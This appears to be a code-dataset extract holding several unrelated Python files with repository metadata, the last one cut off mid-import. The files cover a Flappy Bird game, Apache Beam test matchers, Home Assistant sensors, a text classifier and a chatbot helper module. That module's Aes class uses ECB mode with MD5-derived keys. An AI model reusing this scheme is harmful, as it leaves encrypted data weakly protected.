| 46.761905 | 222 | 0.578411 | 506 | 4,910 | 5.476285 | 0.266798 | 0.090942 | 0.057741 | 0.043306 | 0.223385 | 0.148322 | 0.120895 | 0.110429 | 0.048358 | 0.048358 | 0 | 0.001395 | 0.270265 | 4,910 | 104 | 223 | 47.211538 | 0.771979 | 0.185336 | 0 | 0.03125 | 0 | 0 | 0.244142 | 0.014109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.03125 | 0.015625 | 0.140625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37990b900d049794f3a0a486dc1c773935bc6ed9 | 584 | py | Python | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | def even_odd(A):
pe, po = 0, len(A) - 1
while pe < po:
if A[pe] % 2 == 0:
pe += 1
else:
# if it pe hits an odd, swap with the one at po. if this po bears 1) an even value, next round pe will move right and therefore skip to the next. 2) an odd value, then next round it will be swapped with the entry before current po. In both scenarios, the purpose will be achieved naturally.
A[pe], A[po] = A[po], A[pe]
po -= 1
if __name__ == '__main__':
A = [9, 6, 3, 7, 4, 2, 1, 5, 8, 0]
even_odd(A)
print(A)
| 36.5 | 302 | 0.556507 | 108 | 584 | 2.916667 | 0.509259 | 0.038095 | 0.050794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 0.332192 | 584 | 15 | 303 | 38.933333 | 0.761538 | 0.493151 | 0 | 0 | 0 | 0 | 0.027211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379a96fa891f104347b8acc6017c208b33cfdbbb | 4,072 | py | Python | sdks/python/apache_beam/tests/pipeline_verifiers.py | chamikaramj/beam | 7c710360868d784c5b6bf99b8341748807b08101 | [
"Apache-2.0"
] | 1 | 2019-05-24T14:03:58.000Z | 2019-05-24T14:03:58.000Z | sdks/python/apache_beam/tests/pipeline_verifiers.py | kavyasmj/beam0.6 | d59dfeb339bd56feb7569531e5c421a297b0d3dc | [
"Apache-2.0"
] | 2 | 2017-04-24T20:32:25.000Z | 2022-03-29T12:59:55.000Z | sdks/python/apache_beam/tests/pipeline_verifiers.py | kavyasmj/beam0.6 | d59dfeb339bd56feb7569531e5c421a297b0d3dc | [
"Apache-2.0"
] | 2 | 2019-03-04T02:12:46.000Z | 2021-08-10T20:29:37.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""End-to-end test result verifiers
A set of verifiers that are used in end-to-end tests to verify state/output
of test pipeline job. Customized verifier should extend
`hamcrest.core.base_matcher.BaseMatcher` and override _matches.
"""
import logging
from hamcrest.core.base_matcher import BaseMatcher
from apache_beam.io.fileio import ChannelFactory
from apache_beam.runners.runner import PipelineState
from apache_beam.tests import test_utils as utils
from apache_beam.utils import retry
try:
from apitools.base.py.exceptions import HttpError
except ImportError:
HttpError = None
MAX_RETRIES = 4
class PipelineStateMatcher(BaseMatcher):
"""Matcher that verify pipeline job terminated in expected state
Matcher compares the actual pipeline terminate state with expected.
By default, `PipelineState.DONE` is used as expected state.
"""
def __init__(self, expected_state=PipelineState.DONE):
self.expected_state = expected_state
def _matches(self, pipeline_result):
return pipeline_result.state == self.expected_state
def describe_to(self, description):
description \
.append_text("Test pipeline expected terminated in state: ") \
.append_text(self.expected_state)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Test pipeline job terminated in state: ") \
.append_text(pipeline_result.state)
def retry_on_io_error_and_server_error(exception):
"""Filter allowing retries on file I/O errors and service error."""
if isinstance(exception, IOError) or \
(HttpError is not None and isinstance(exception, HttpError)):
return True
else:
return False
class FileChecksumMatcher(BaseMatcher):
"""Matcher that verifies file(s) content by comparing file checksum.
Use apache_beam.io.fileio to fetch file(s) from given path. File checksum
is a hash string computed from content of file(s).
"""
def __init__(self, file_path, expected_checksum):
self.file_path = file_path
self.expected_checksum = expected_checksum
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_io_error_and_server_error)
def _read_with_retry(self):
"""Read path with retry if I/O failed"""
read_lines = []
matched_path = ChannelFactory.glob(self.file_path)
if not matched_path:
raise IOError('No such file or directory: %s' % self.file_path)
for path in matched_path:
with ChannelFactory.open(path, 'r') as f:
for line in f:
read_lines.append(line)
return read_lines
def _matches(self, _):
# Read from given file(s) path
read_lines = self._read_with_retry()
# Compute checksum
self.checksum = utils.compute_hash(read_lines)
logging.info('Read from given path %s, %d lines, checksum: %s.',
self.file_path, len(read_lines), self.checksum)
return self.checksum == self.expected_checksum
def describe_to(self, description):
description \
.append_text("Expected checksum is ") \
.append_text(self.expected_checksum)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual checksum is ") \
.append_text(self.checksum)
| 33.933333 | 75 | 0.747299 | 560 | 4,072 | 5.271429 | 0.328571 | 0.0271 | 0.020325 | 0.01084 | 0.176152 | 0.109756 | 0.109756 | 0.090786 | 0.057588 | 0.057588 | 0 | 0.001492 | 0.176817 | 4,072 | 119 | 76 | 34.218487 | 0.879177 | 0.370334 | 0 | 0.131148 | 0 | 0 | 0.080208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163934 | false | 0 | 0.131148 | 0.016393 | 0.409836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d365c3b72852583302df9254d3e745ae62646 | 4,975 | py | Python | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | import pygame, random
from pygame.locals import *
SCREEN_WIDTH = 400
SCREEN_HEIGTH = 800
SPEED = 10
GRAVITY = 1
GAME_SPEED = 10
X = 0
Y = 1
GROUND_WIDTH = 2 * SCREEN_WIDTH
GROUND_HEIGHT = 100
PIPE_WIDTH = 80
PIPE_HEIGHT = 500
PIPE_GAP = 200
class Bird(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.images = [
pygame.image.load("assets/yellowbird-upflap.png").convert_alpha(),
pygame.image.load("assets/yellowbird-midflap.png").convert_alpha(),
pygame.image.load("assets/yellowbird-downflap.png").convert_alpha()
]
self.speed = SPEED
# Currente image starts with 0 (upflap)
self.current_image = 0
self.image = pygame.image.load("assets/yellowbird-upflap.png").convert_alpha()
self.mask = pygame.mask.from_surface(self.image)
# rect tupla de 4
self.rect = self.image.get_rect()
self.rect[0] = (SCREEN_WIDTH / 2) - self.rect[2]
self.rect[1] = (SCREEN_HEIGTH / 2) - self.rect[3]
def update(self):
# Batendo asas
# Cycle between 0 and 3
self.current_image = (self.current_image + 1) % 3
self.image = self.images[self.current_image]
self.speed += GRAVITY
# Update heigt
self.rect[1] += self.speed
def bump(self):
self.speed = -SPEED
class Pipe(pygame.sprite.Sprite):
def __init__(self, inverted, xpos, ysize):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("assets/pipe-green.png").convert_alpha()
self.image = pygame.transform.scale(self.image,(PIPE_WIDTH,PIPE_HEIGHT))
self.rect = self.image.get_rect()
self.rect[X] = xpos
if inverted:
self.image = pygame.transform.flip(self.image, False, True)
self.rect[Y] = - (self.rect[3] - ysize)
else:
self.rect[Y] = SCREEN_HEIGTH - ysize
self.mask = pygame.mask.from_surface(self.image)
def update(self):
self.rect[X] -= GAME_SPEED
class Ground(pygame.sprite.Sprite):
def __init__(self, xpos):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("assets/base.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (GROUND_WIDTH, GROUND_HEIGHT))
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
self.rect[X] = xpos
self.rect[Y] = SCREEN_HEIGTH - GROUND_HEIGHT
def update(self):
# Eixo X
self.rect[X] -= GAME_SPEED
def is_off_screen(sprite):
return sprite.rect[X] < - (sprite.rect[2])
def get_random_pipes(xpos):
size = random.randint(100, 300)
pipe = Pipe(False, xpos, size)
pipe_inverted = Pipe(True, xpos, SCREEN_HEIGTH - size - PIPE_GAP)
return (pipe, pipe_inverted)
pygame.init()
# display.set_mode() create a screen game
# arguments: tuple with width and heigth
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGTH))
BACKGROUND = pygame.image.load("assets/background-day.png")
# Changing the sclae of the image
BACKGROUND = pygame.transform.scale(BACKGROUND, (SCREEN_WIDTH, SCREEN_HEIGTH))
bird_group = pygame.sprite.Group()
bird = Bird()
bird_group.add(bird)
ground_group = pygame.sprite.Group()
for i in range(2):
ground = Ground(i * GROUND_WIDTH)
ground_group.add(ground)
pipe_group = pygame.sprite.Group()
for i in range(2):
pipes = get_random_pipes(SCREEN_WIDTH * i + 600)
pipe_group.add(pipes[0])
pipe_group.add(pipes[1])
clock = pygame.time.Clock()
while True:
clock.tick(10)
for event in pygame.event.get():
# Seeing whats this event
if event.type == QUIT:
pygame.quit()
if event.type == KEYDOWN:
if event.key == K_SPACE:
bird.bump()
# For each frame blit background
screen.blit(BACKGROUND, (0,0))
if is_off_screen(ground_group.sprites()[0]):
ground_group.remove(ground_group.sprites()[0])
new_ground = Ground(GROUND_WIDTH - 20)
ground_group.add(new_ground)
if is_off_screen(pipe_group.sprites()[0]):
pipe_group.remove(pipe_group.sprites()[0])
pipe_group.remove(pipe_group.sprites()[0])
pipes = get_random_pipes(SCREEN_WIDTH * 2)
pipe_group.add(pipes[0])
pipe_group.add(pipes[1])
bird_group.update()
ground_group.update()
pipe_group.update()
pipe_group.draw(screen)
ground_group.draw(screen)
bird_group.draw(screen)
pygame.display.update()
if (pygame.sprite.groupcollide(bird_group, ground_group, False, False, pygame.sprite.collide_mask)
or pygame.sprite.groupcollide(bird_group, pipe_group, False, False, pygame.sprite.collide_mask)):
# Game Over
input()
pygame.display.update()
break
| 26.604278 | 102 | 0.637186 | 659 | 4,975 | 4.629742 | 0.200303 | 0.047198 | 0.034415 | 0.048181 | 0.408391 | 0.361193 | 0.300229 | 0.27532 | 0.202229 | 0.145854 | 0 | 0.018037 | 0.242211 | 4,975 | 186 | 103 | 26.747312 | 0.791247 | 0.057487 | 0 | 0.222222 | 0 | 0 | 0.037639 | 0.034431 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.017094 | 0.008547 | 0.136752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d69c530c32691ab9a0100007cee3fa8cae31c | 2,487 | py | Python | GolVe_Classification/GolVe+lr/train_model.py | majingliang/machine_learning | cd70e3a07bd1f0803ebcffebca565e70aff96de8 | [
"MIT"
] | 1 | 2019-09-29T13:36:29.000Z | 2019-09-29T13:36:29.000Z | GolVe_Classification/GolVe+lr/train_model.py | yummydeli/machine_learning | 54471182ac21ef0eee26557a7bd6f3a3dc3a09bd | [
"MIT"
] | null | null | null | GolVe_Classification/GolVe+lr/train_model.py | yummydeli/machine_learning | 54471182ac21ef0eee26557a7bd6f3a3dc3a09bd | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.datasets.base import Bunch
import os
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cross_validation import train_test_split
import random
from collections import defaultdict
from sklearn.linear_model import LogisticRegressionCV, LinearRegression
from sklearn.metrics import roc_auc_score
from snownlp import SnowNLP
from sklearn.externals import joblib
import sys
sys.path.append('/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/baseline')
from unit import metric, qieci
if __name__ == '__main__':
# load data
train_comment_path = '/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/comment_cutwords.csv'
train_comment_data = pd.read_csv(open(train_comment_path, 'rU'), header=0)
print(train_comment_data.head())
with open(
'/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/model_data/vocab_emb.dat',
'rb') as f:
vocab_emb = pickle.load(f)
emb_train = []
label = []
for i in range(train_comment_data.shape[0]):
line = train_comment_data.after_cut[i]
cnt = 0
try:
seq = line.split(' ')
except:
print('not a common sequence')
print(line)
continue
for word in seq:
try:
if cnt == 0:
emb = np.array(vocab_emb[word])
else:
emb += np.array(vocab_emb[word])
cnt += 1
except:
continue
if np.isnan(sum(emb / cnt)):
print('not a common length')
print(line)
else:
emb_train.append(emb / cnt)
label.append([train_comment_data.label[i]])
emb_train = np.array(emb_train)
label = np.hstack(label)
lr = LogisticRegressionCV(multi_class="ovr", fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty="l2",
solver="lbfgs", tol=0.01, class_weight={0: 0.1, 1: 0.9})
re = lr.fit(emb_train, label)
f1 = lr.predict_proba(emb_train)[:, 1]
merge_data = pd.DataFrame(np.stack([f1, label], axis=1), columns=['pred', 'actual'])
eval_res = metric(merge_data)
joblib.dump(re,
"/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/train_model.m")
| 36.573529 | 136 | 0.644552 | 334 | 2,487 | 4.613772 | 0.407186 | 0.05451 | 0.051914 | 0.057106 | 0.215445 | 0.215445 | 0.186892 | 0.186892 | 0.186892 | 0.186892 | 0 | 0.0128 | 0.24608 | 2,487 | 67 | 137 | 37.119403 | 0.809067 | 0.003619 | 0 | 0.166667 | 0 | 0.066667 | 0.195477 | 0.165994 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d9ac43e5f8a9e61641e45c339fb8f78a1a4d0 | 3,136 | py | Python | homeassistant/components/sensor/wink.py | TastyPi/home-assistant | aa1e4c564cb8660bf6b7637bc25317ee58869214 | [
"MIT"
] | 13 | 2017-02-01T13:25:34.000Z | 2022-01-26T01:30:39.000Z | homeassistant/components/sensor/wink.py | 1Forward1Back/home-assistant | ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6 | [
"MIT"
] | 9 | 2017-07-26T18:05:32.000Z | 2021-12-05T14:16:34.000Z | homeassistant/components/sensor/wink.py | 1Forward1Back/home-assistant | ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6 | [
"MIT"
] | 21 | 2017-07-26T17:09:40.000Z | 2022-03-27T22:37:22.000Z | """
Support for Wink sensors.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/sensor.wink/
"""
import logging
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from homeassistant.components.wink import WinkDevice
from homeassistant.loader import get_component
DEPENDENCIES = ['wink']
SENSOR_TYPES = ['temperature', 'humidity', 'balance', 'proximity']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Wink platform."""
import pywink
for sensor in pywink.get_sensors():
if sensor.capability() in SENSOR_TYPES:
add_devices([WinkSensorDevice(sensor, hass)])
for eggtray in pywink.get_eggtrays():
add_devices([WinkEggMinder(eggtray, hass)])
for piggy_bank in pywink.get_piggy_banks():
try:
if piggy_bank.capability() in SENSOR_TYPES:
add_devices([WinkSensorDevice(piggy_bank, hass)])
except AttributeError:
logging.getLogger(__name__).info("Device is not a sensor")
class WinkSensorDevice(WinkDevice, Entity):
"""Representation of a Wink sensor."""
def __init__(self, wink, hass):
"""Initialize the Wink device."""
super().__init__(wink, hass)
wink = get_component('wink')
self.capability = self.wink.capability()
if self.wink.UNIT == '°':
self._unit_of_measurement = TEMP_CELSIUS
else:
self._unit_of_measurement = self.wink.UNIT
@property
def state(self):
"""Return the state."""
state = None
if self.capability == 'humidity':
if self.wink.humidity_percentage() is not None:
state = round(self.wink.humidity_percentage())
elif self.capability == 'temperature':
if self.wink.temperature_float() is not None:
state = round(self.wink.temperature_float(), 1)
elif self.capability == 'balance':
if self.wink.balance() is not None:
state = round(self.wink.balance() / 100, 2)
elif self.capability == 'proximity':
if self.wink.proximity_float() is not None:
state = self.wink.proximity_float()
else:
# A sensor should never get here, anything that does
# will require an update to python-wink
logging.getLogger(__name__).error("Please report this as an issue")
state = None
return state
@property
def available(self):
"""True if connection == True."""
return self.wink.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
class WinkEggMinder(WinkDevice, Entity):
"""Representation of a Wink Egg Minder."""
def __init__(self, wink, hass):
"""Initialize the sensor."""
WinkDevice.__init__(self, wink, hass)
@property
def state(self):
"""Return the state."""
return self.wink.state()
| 32.666667 | 79 | 0.638712 | 365 | 3,136 | 5.323288 | 0.309589 | 0.065878 | 0.025733 | 0.028821 | 0.210499 | 0.198147 | 0.160062 | 0 | 0 | 0 | 0 | 0.002141 | 0.255421 | 3,136 | 95 | 80 | 33.010526 | 0.82955 | 0.162628 | 0 | 0.2 | 0 | 0 | 0.050933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116667 | false | 0 | 0.1 | 0 | 0.316667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379e0ba70961375d128909802ed03cfc631262e2 | 2,925 | py | Python | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import random
import hashlib
from base64 import urlsafe_b64encode, urlsafe_b64decode
from Crypto.Cipher import AES
def escape(s: str, *, escape_comma: bool = True) -> str:
s = s.replace('&', '&') \
.replace('[', '[') \
.replace(']', ']')
if escape_comma:
s = s.replace(',', ',')
return s
def unescape(s: str) -> str:
return s.replace(',', ',') \
.replace('[', '[') \
.replace(']', ']') \
.replace('&', '&')
def pad(text, blocksize=16):
"""
PKCS#5 Padding
"""
pad = blocksize - (len(text) % blocksize)
return text + pad * chr(pad)
def unpad(text):
"""
PKCS#5 Padding
"""
pad = ord(text[-1])
return text[:-pad]
def salt(length=8):
"""
生成长度为length 的随机字符串
"""
aplhabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
return ''.join([random.choice(aplhabet) for _ in range(length)])
class Aes(object):
def __init__(self, app_id='', app_key=''):
self.key = hashlib.md5(f"{app_id}{app_key}".encode("utf-8")).hexdigest()
def decrypt_dict(self, ciphertext, base64=True):
return json.loads(self.decrypt(ciphertext, base64))
def encrypt_dict(self, value, base64=True):
return self.encrypt(json.dumps(value), base64)
def decrypt(self, ciphertext, base64=True):
"""
AES Decrypt
"""
if base64:
ciphertext = urlsafe_b64decode(str(ciphertext + '=' * (4 - len(ciphertext) % 4)))
data = ciphertext
key = self.key.encode('utf-8')
key = hashlib.md5(key).digest()
cipher = AES.new(key, AES.MODE_ECB)
return unpad(cipher.decrypt(data).decode())
def encrypt(self, plaintext, base64=True):
"""
AES Encrypt
"""
key = self.key.encode('utf-8')
key = hashlib.md5(key).digest()
cipher = AES.new(key, AES.MODE_ECB)
plaintext = pad(plaintext).encode('utf-8')
ciphertext = cipher.encrypt(plaintext)
# 将密文base64加密
if base64:
ciphertext = urlsafe_b64encode(ciphertext).decode().rstrip('=')
return ciphertext
| 28.676471 | 93 | 0.631111 | 359 | 2,925 | 5.089136 | 0.440111 | 0.032841 | 0.021894 | 0.021346 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0 | 0.033363 | 0.231453 | 2,925 | 101 | 94 | 28.960396 | 0.779359 | 0.270769 | 0 | 0.16 | 0 | 0 | 0.073255 | 0.030482 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.06 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a06a46bd7dbc7b3904bddfec3b2e850b11c9b4 | 518 | py | Python | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | import json
import pytest
from oandaV20helper.endpoints.pricing import to_dom
class TestPricing:
@pytest.mark.parametrize("num, filename", [
(1, 'test_pricing01.json'),
(3, 'test_pricing02.json'),
(15, 'test_pricing03.json')
])
def test_to_dataframe(self, num, filename):
with open(filename, 'r') as f:
raw_dict = json.load(f)
result = to_dom(raw_dict)
print(result)
# if __name__ == '__main__':
# pytest.main(['-v', __file__])
| 22.521739 | 51 | 0.606178 | 62 | 518 | 4.725806 | 0.645161 | 0.03413 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.258687 | 518 | 22 | 52 | 23.545455 | 0.731771 | 0.11583 | 0 | 0 | 0 | 0 | 0.156044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.357143 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a25acc37f7d6522679e3d2bfe44a22a8595cc0 | 2,364 | py | Python | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | import logging
from pathlib import Path
from utsc.core import Util
class PropogateHandler(logging.Handler):
def emit(self, record):
logging.getLogger(record.name).handle(record)
class MockFolders:
class ConfDir:
def __init__(self, path: Path, app_name: str) -> None:
self.dir = path
self.ini_file = path.joinpath(f"{app_name}.ini")
self.json_file = path.joinpath(f"{app_name}.json")
self.yaml_file = path.joinpath(f"{app_name}.yaml")
self.toml_file = path.joinpath(f"{app_name}.toml")
def __init__(self, tmp_path: Path, app_name: str) -> None:
self.root = tmp_path
self.site_config = MockFolders.ConfDir(
tmp_path / "etc/xdg/utsc-tools", app_name
)
# This would be:
# - /Library/Application Support/utsc-tools on MacOS,
# - /etc/xdg/utsc-tools on Linux,
# - C:\ProgramData\utsc-tools on Win 7+
# an alternative site config path, used to test the *_SITE_CONFIG env var logic
self.site_config_env = MockFolders.ConfDir(tmp_path / "etc/alternate", app_name)
self.user_config = MockFolders.ConfDir(
tmp_path / "home/user/.config/utsc-tools", app_name
)
# This would be:
# - ~/Library/Application Support/utsc-tools on MacOS,
# - ~/.config/utsc-tools on Linux,
# - C:\Users\<username>\AppData\Local\utsc-tools on Win 7+
# an alternative user config path, used to test the *_USER_CONFIG env var logic
self.user_config_env = MockFolders.ConfDir(
tmp_path / "home/alternate", app_name
)
self.site_cache = tmp_path / f"usr/local/share/utsc-tools/{app_name}"
self.user_cache = tmp_path / f"home/user/.local/share/utsc-tools/{app_name}"
self.site_cache_env = tmp_path / "usr/local/share/utsc-tools/alternate"
self.user_cache_env = tmp_path / "home/user/.local/share/utsc-tools/alternate"
# create the folders
self.site_config.dir.mkdir(parents=True)
self.site_config_env.dir.mkdir(parents=True)
self.user_config.dir.mkdir(parents=True)
self.user_config_env.dir.mkdir(parents=True)
self.site_cache.mkdir(parents=True)
self.user_cache.mkdir(parents=True)
class MockedUtil(Util):
mock_folders: MockFolders
| 38.129032 | 88 | 0.648054 | 321 | 2,364 | 4.588785 | 0.242991 | 0.057026 | 0.044807 | 0.067889 | 0.634759 | 0.466395 | 0.274949 | 0.092329 | 0.092329 | 0.092329 | 0 | 0.001109 | 0.236887 | 2,364 | 61 | 89 | 38.754098 | 0.81541 | 0.198393 | 0 | 0 | 0 | 0 | 0.155072 | 0.099841 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.078947 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a39ff3342130319876ca4904644fe3206688ea | 3,889 | py | Python | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import number
from esphome.const import (
CONF_ADDRESS,
CONF_ID,
CONF_MAX_VALUE,
CONF_MIN_VALUE,
CONF_MULTIPLY,
CONF_STEP,
)
from .. import (
MODBUS_WRITE_REGISTER_TYPE,
add_modbus_base_properties,
modbus_controller_ns,
modbus_calc_properties,
ModbusItemBaseSchema,
SensorItem,
SENSOR_VALUE_TYPE,
)
from ..const import (
CONF_BITMASK,
CONF_CUSTOM_COMMAND,
CONF_FORCE_NEW_RANGE,
CONF_MODBUS_CONTROLLER_ID,
CONF_REGISTER_TYPE,
